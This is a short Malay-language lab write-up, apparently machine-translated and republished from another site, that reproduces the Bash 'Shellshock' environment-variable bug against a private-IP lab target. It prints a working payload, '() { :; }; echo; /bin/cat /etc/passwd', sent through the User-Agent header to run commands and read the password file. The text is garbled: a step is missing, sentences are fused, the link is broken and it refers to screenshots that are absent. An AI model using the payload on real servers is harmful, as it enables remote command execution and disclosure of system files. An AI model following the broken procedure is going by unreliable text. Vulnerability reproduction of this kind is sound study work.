Rumah >Operasi dan penyelenggaraan >Keselamatan >Contoh analisis pengulangan kelemahan bash

Contoh analisis pengulangan kelemahan bash

WBOY
WBOYke hadapan
2023-05-19 11:13:111293semak imbas

Bourne Again Shell (pendek kata BASH) ialah pelaksanaan SHELL yang paling popular pada GNU/Linux Ia dilahirkan pada tahun 1980. Selepas beberapa dekad evolusi, ia telah berkembang daripada penterjemah baris perintah terminal untuk disepadukan secara mendalam dengan GNU. sistem antara muka pelbagai fungsi.

Bash, sejenis cangkerang Unix. Versi rasmi pertama dikeluarkan pada tahun 1989. Ia pada asalnya dirancang untuk digunakan pada sistem pengendalian GNU, tetapi ia boleh dijalankan pada kebanyakan sistem pengendalian seperti Unix, termasuk Linux dan Mac OS X v10.4, yang menggunakannya sebagai lalai cangkerang. Ia juga telah dialihkan ke Cygwin dan MinGW pada Microsoft Windows, atau tersedia sebagai projek DJGPP pada MS-DOS. Terdapat juga port pada Novell NetWare dan Android.

Pembolehubah persekitaran yang sedang digunakan oleh Bash dipanggil melalui nama fungsi Apa yang menyebabkan kerentanan ialah selepas pembolehubah persekitaran yang ditakrifkan bermula dengan "(){" dihuraikan ke dalam fungsi dalam perintah ENV, pelaksanaan Bash gagal. Keluar, tetapi teruskan menghuraikan dan melaksanakan perintah shell Alasan utama ialah tiada sempadan ketat dalam penapisan input, dan tiada pertimbangan parameter yang sah dibuat.

Artikel ini hanya merekodkan dan melaksanakan pengulangan kerentanan Proses penggunaan adalah seperti berikut:

1 Persekitaran Kerentanan

Pautan: http://192.168.101.152:8080. /korban. untuk kawalan jauh pelaksanaan Perintah

3 Gunakan proses Contoh analisis pengulangan kelemahan bash

untuk mengakses sasaran

() { :; }; echo; /bin/cat /etc/passwd

Ganti nilai Ejen Pengguna dengan muatan ke. laksanakan arahan

Ejen Pengguna tidak diperlukan

Contoh analisis pengulangan kelemahan bash

<br>

Atas ialah kandungan terperinci Contoh analisis pengulangan kelemahan bash. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Kenyataan:
Artikel ini dikembalikan pada:yisu.com. Jika ada pelanggaran, sila hubungi admin@php.cn Padam